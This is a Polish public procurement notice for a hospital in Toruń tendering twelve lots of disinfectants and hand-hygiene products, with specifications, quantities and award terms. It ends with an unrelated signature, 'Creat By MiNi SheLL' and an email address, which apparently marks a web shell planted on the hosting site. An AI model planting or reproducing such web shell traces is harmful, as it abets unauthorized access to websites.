<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający przewiduje możliwość aneksowania terminu obowiązywania umowy w przypadku niezrealizowania jej pod względem ilościowym w obowiązującym terminie umownym.<br>

2. Ceny podane w ofercie będą obowiązywać przez okres trwania umowy, a w przypadku zmiany obowiązującej stawki podatku VAT w okresie trwania umowy Wykonawca ma prawo doliczyć do cen netto ustalonych w umowie należny podatek VAT według obowiązującej stawki. Zmiana ta nie będzie stanowiła zmiany umowy i nie będzie wymagała aneksu</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital-bielany.torun.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.szpital-bielany.torun.pl lub Wojewódzki Szpital Zespolony im. Ludwika Rydygiera ul. Św. Józefa 53/59, 87- 100 Toruń, Dział Zamówień Publicznych- pokój nr 2.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.04.2011 godzina 09:30, miejsce: Kancelaria
Wojewódzkiego Szpitala Zespolonego im. Ludwika Rydygiera
ul. Św. Józefa 53/59, 87-100 Toruń.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie Nr 1: Dezynfekcja i mycie narzędzi.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie Nr 1: Dezynfekcja i mycie narzędzi <br>
1.1 Środek dezynfekcyjny nie zawierający: aldehydów, pochodnych fenolowych, związków chloru, QAV i substancji nadtlenowych <br>
- spektrum działania - B, F, V, Tbc<br>
- max czas 1 h <br>(65.000 l)<br>
1.2: Środek do dezynfekcji narzędzi  i osprzętu endoskopowego na bazie aktywnego tlenu (z wykluczeniem nadboranu sodu)<br>
- spektrum działania - B, F, V (polio), Tbc - 10 min 
B, F (A. Niger), V (Polio, Adeno), Tbc (M.Tuberculosis),<br>
- max czas 15 min. <br>
- trwałość roztworu 24 godz. kontrolowana przy pomocy pasków<br>
- przygotowanie roztworu w wodzie o temp. pokojowej <br>(75.000 l)<br>
1.3. Środek do dezynfekcji narzędzi i osprzętu endoskopowego na bazie aktywnego tlenu (z wykluczeniem nadboranu sodu)<br>
- spektrum działania - B, F, V (polio), Tbc - 10min 
B, F (A. Niger), V (Polio, Adeno), Tbc (M.Tuberculosis),<br>
- max czas 15 min. <br>
- trwałość roztworu 24 godz. kontrolowana przy pomocy pasków<br>
- przygotowanie roztworu w wodzie o temp. pokojowej<br>
Opakowanie do 1,5 kg <br>(9.000 l)<br>

1.4.Enzymatyczny preparat do mycia wstępnego endoskopów, ph 5-6 - 10.800 l<br>

1.5. Aldehydowy, gotowy do użycia środek z aktywatorem do dezynfekcji endoskopów giętkich. Trwałość roztworu 14 dni, kontrolowana przy pomocy pasków. <br>
Spektrum: B, F, Tbc, V, S -10 godz.<br>
Opakowanie: 5l. <br>- 400 l.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie Nr 2:Preparaty do dezynfekcji maszynowej endoskopów..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie Nr 2:Preparaty do dezynfekcji maszynowej endoskopów:
2.1 Detergentowy preparat myjący do myjni endoskopowej ETD PAA:<br>
- skład: niejonowe środki powierzchniowo-czynne, glikol<br>
- przeznaczenie: mycie maszynowe w myjniach OLYMPUS ETD<br>
- dozowanie - 5ml/l<br>
- opakowanie zawierające 4l koncentratu <br>(120 l)<br>
2.2 Preparat dezynfekcyjny do myjni endoskopowej ETD PAA:<br>
- skład: kwas octowy i nadoctowy, nadtlenek wodoru<br>
- spektrum działania: B, F, Tbc, V<br>
- przeznaczenie: dezynfekcja chemiczno-termiczna w myjniach OLYMPUS ETD<br>
- dozowanie: 10 ml/l<br>
- opakowanie zawierające 2,8 ml/l <br>(176,4 l)<br>
2.3 Aktywator do preparatu dezynfekcyjnego<br>
- dozowanie: 10 ml/l<br>
- opakowanie zawierające 4l koncentratu<br>
Pakiet jest nierozłączny. Preparaty muszą być kompatybilne ze sobą (pochodzić od jednego producenta)  <br>(180 l)<br>
2.4.Enzymatyczny preparat myjący do maszynowego mycia endoskopów w myjni ETD. Opakowanie zawierające 4 l preparatu. - 108 l<br>
2.5. Aldehydowy preparat dezynfekcyjny do myjni ETD. Opakowanie zawierające  4 litry preparatu.
Pakiet jest nierozłączny. Preparaty kompatybilne (od jednego producenta). - 168 l.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie Nr 3: Dezynfekcja dużych powierzchni zmywalnych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie Nr 3: Dezynfekcja dużych powierzchni zmywalnych: <br>
3.1 Preparat myjąco-dezynfekujący, bez aldehydów, pochodnych fenolowych, związków chloru, QAV i kwasu nadoctowego<br>
- spektrum działania - B, F, V(HIV, HBV, Vakcinia, Rota), Tbc<br>
- max czas 15 min. <br>(110.000 l)<br>
3.2 Preparat dezynfekcyjny do powierzchni  oraz basenów i kaczek.
(substancja aktywna - NaDCC <br>
- spektrum działania - B, V (Polio, Adeno), F (Aspergillus Niger), Tbc (M.Tuberculosis)<br>
- max czas 15 min<br>
- max stężenie aktywnego chloru - 2.000
  ppm w roztworze <br>
- pH roztworu 7<br>
- skuteczny wobec S (Cl. Dificille) w wyższych stężeniach <br>(150.000 l)<br>
3.3 Preparat na bazie nadtlenku wodoru, bez zawartości chloru, fenolu i aldehydów<br>
- spektrum działania: B (MRSA), F, V (HIV, HBV, Rota)<br>
- max czas działania - 15 min. Tbc do 30 min.  <br>(55.000 l)<br>
3.4 Preparat na bazie nadwęglanu sodu do mycia i dezynfekcji powierzchni zanieczyszczonych materiałem organicznym. Nie zawierający aldehydów, QAV, fenoli, chloru i barwników. Wymagany neutralny odczyn roztworu (pH=7,0-8,0). Produkt w postaci proszku<br>
- spektrum B, F, Tbc (m. tuberculosis), V(Polio), S<br>
- max czas działania 15 min <br>(160 l).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie Nr 4: Dezynfekcja powierzchni trudnodostępnych (alkohole) bez aldehydów i chlorhexydyny..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie Nr 4: Dezynfekcja powierzchni trudnodostępnych (alkohole) bez aldehydów i chlorhexydyny <br>              
- spektrum działania - B, F, V (Vakcinia, Adeno), Tbc (M. Tuberculosis) - 5 min.<br>
- B, F, Rota - 1 min. <br>(1440 l).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie Nr 5: Dezynfekcja inkubatorów..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie Nr 5: Dezynfekcja inkubatorów<br>
- spektrum działania - B, F (A.Niger), V (Polio, Adeno), Tbc (M.Tuberculosis)<br>
- na bazie aktywnego tlenu<br>
- max czas 0,5 h  <br>(5000 l).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie Nr 6: Dezynfekcja drobnego sprzętu medycznego i powierzchni za pomocą chusteczek..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie Nr 6: Dezynfekcja drobnego sprzętu medycznego i powierzchni za pomocą chusteczek <br>
6.1 Chusteczki z włókniny wiskozowej nasączonej alkoholem, do dezynfekcji drobnego sprzętu np. słuchawki lekarskie itp. <br>
- min. wymiary: 13x17 cm <br>
- spektrum działania: B, Tbc, F, V (HIV, HBV, HCV) <br>
- max. czas działania: 1 min. <br>
Opakowanie: sztywny pojemnik umożliwiający pobieranie pojedynczych chusteczek <br>(18.000 szt.)<br>
6.2. Bezalkoholowe chusteczki z włókniny wiskozowej nasączone płynem dezynfekcyjnym na bazie QAV do dezynfekcji głowic USG oraz małych powierzchni, skuteczne wobec wirusów polio, adeno i rota.<br>
- min. wymiary: 24 x 30 cm<br>
- spektrum działania: <br>
B, F, V (HIV, HBV, HCV) - 1 min.<br>
B, F(a. Niger), Tbc, V (noro) - 15 min.<br>
Opakowanie: sztywny pojemnik umożliwiający pobieranie pojedynczych chusteczek<br>(150.000 szt.).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zadanie nr 7: Preparat w postaci pianki do dezynfekcji sprzętu i aparatury medycznej wrażliwych na działanie alkoholi..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 7: Preparat w postaci pianki do dezynfekcji sprzętu i aparatury medycznej wrażliwych na działanie alkoholi<br>
- preparat bez aldehydów, chloru i pochodnych fenolowych,<br>
- spektrum działania - B, F, V, Tbc - 5 min. <br>
Butelka ze spryskiwaczem do 750 ml. <br>(144 op.).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zadanie Nr 8: Mycie, dezynfekcja i pielęgnacja rąk..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie Nr 8: Mycie, dezynfekcja i pielęgnacja rąk:<br>
8.1 Dezynfekcja rąk
        Preparat na bazie co najmniej trzech substancji czynnych z różnych grup chemicznych, bez chlorheksydyny i pochodnych fenolowych.<br>
- spektrum działania - B, F, V(HIV, HBV, HSV, Rota), Tbc<br>
- pH 5-5,5 <br>
8.1.1 Preparat w pojemnikach do 0,5l - 1100 l <br>
8.1.2 Preparat w pojemnikach do 5l - 2200 l <br>
8.2 Płyn do mycia chirurgicznego
        i higienicznego rąk niezawierający mydła, <br>
        pH 5- 5,5  <br>
8.2.1 Preparat w pojemnikach do 0,5l - 1100 l <br>
8.2.2 Preparat w pojemnikach do 6l - 300 l <br>

8.3 Emulsja do pielęgnacji rąk<br>
Preparaty kompatybilne (od jednego producenta) - 220 l.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Zadanie Nr 9: Dezynfekcja i mycie rąk..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie Nr 9: Dezynfekcja i mycie rąk<br>
9.1 Preparat do chirurgicznej i higienicznej dezynfekcji rąk
- opakowania dostosowane do systemu Sterisol - 1700 l <br>
9.2 Preparat do higienicznego i chirurgicznego mycia rąk oraz do mycia i pielęgnacji ciała pacjenta
-opakowania dostosowane do systemu Sterisol - 1550 l <br>
9.3. Krem nawilżający do systemu Sterisol
Preparaty od jednego producenta - 21 l.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Zadanie Nr 10: Dezynfekcja maszynowa narzędzi chirurgicznych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie Nr 10: Dezynfekcja maszynowa narzędzi chirurgicznych<br>
10.1 Płynny, alkaliczny preparat do mycia i dezynfekcji chemicznej w myjniach-dezynfektorach narzędzi (również aluminiowych) i sprzętu anestezjologicznego, nie wymagający neutralizacji. Na bazie wodorotlenku potasu i tenzydów. Spektrum: B, F, Tbc, V - 500 l <br>
10.2 Płynny środek płuczący do myjni-dezynfektorów
Preparaty od jednego producenta. - 100 l.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Zadanie Nr 11: Dezynfekcja maszynowa basenów i kaczek..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie Nr 11: Dezynfekcja maszynowa basenów i kaczek<br>
11.1 Preparat do maszynowego mycia i płukania basenów szpitalnych i kaczek zawierający w składzie niejonowe zw. pow-czynne, inhibitory korozji i kwasy organiczne. O właściwościach odkamieniających (pH 1).
Dozowanie 0,5ml/l na każde 5 st. twardości wody. - 500 l <br>
11.2 Enzymatyczny preparat do mycia basenów i kaczek pH 5,5-7  - 50 l.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Zadanie Nr 12:  Środek myjąco-dezynfekujący w postaci żelu do czyszczenia odsysaczy i ślinociągów stomatologicznych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie Nr 12:  Środek myjąco-dezynfekujący w postaci żelu do czyszczenia odsysaczy i ślinociągów stomatologicznych, w opakowaniu 1000 ml  z dozownikiem. Środek na bazie glukoprotaminy. Czas działania min. 5 min. 
- spektrum działania B, F, V (HBV, HIV), Tbc - 90 l.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com